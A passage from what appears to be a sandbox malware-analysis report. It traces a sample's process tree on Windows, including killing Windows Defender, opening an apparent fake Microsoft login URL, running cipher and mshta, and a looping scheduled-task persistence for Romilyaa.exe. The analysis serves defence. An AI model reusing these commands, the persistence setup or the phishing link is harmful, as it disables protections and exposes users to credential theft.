- Runs ping.exe
PID:640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵
- System Location Discovery: System Language Discovery
PID:384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ23⤵
- Manipulates Digital Signatures
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947184⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:24⤵PID:4268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:84⤵PID:3884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:14⤵PID:856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:14⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:14⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:14⤵PID:5800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:14⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:14⤵PID:5640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:14⤵PID:5312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:84⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1920 /prefetch:24⤵PID:8672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:14⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:14⤵PID:4196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:14⤵PID:8328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2304 /prefetch:14⤵PID:8724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:14⤵PID:8428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:14⤵PID:8516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:14⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:14⤵PID:2456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:1364
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:5460
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:3544
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\Rover.exeRover.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\web.htm3⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947184⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,8690202403079511743,16040498607515817245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5796
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:1052
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:5968
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6096
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5460
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5648
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5500
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6092
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 18085⤵
- Program crash
PID:6200
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
- System Location Discovery: System Language Discovery
PID:5628 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\is-RGFG2.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-RGFG2.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$1036A,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:6152 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6260
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:6184 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6296
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\regmess.exeregmess.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_51d1c205-c42b-40e5-bf7d-0e1d4ad47b63\regmess.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5440 -
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵PID:6044
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:5224
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:6024
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:4176
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:5960
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:1556
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3544
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:6724 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6940
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7000 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:7036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pc8glp8LK1ff.bat" "5⤵PID:7136
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:1928
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6212
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6508 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kf2fIpEww7x1.bat" "7⤵PID:2408
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6700
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1772
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7832 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:7460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\k79M5yqeHZXk.bat" "9⤵PID:5380
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:436
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4776
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6628 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:7184
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SIhrb24qQZrN.bat" "11⤵PID:7604
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:8068
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8092
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
PID:3512 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:4016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gtS3RpuDGRYF.bat" "13⤵PID:4356
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:5476
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:456
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵PID:3544
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:8388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DcdUkOTUsIHj.bat" "15⤵PID:9024
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:9096
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8832
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵PID:436
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:8752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YBQGH7HDzPYy.bat" "17⤵PID:8536
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:8352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8380
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵PID:636
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:5876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqTkb2uNApMf.bat" "19⤵PID:8984
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:6936
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1708
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵PID:2492
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:6480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zCHOq8muK4M2.bat" "21⤵PID:8888
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:9024
-
-
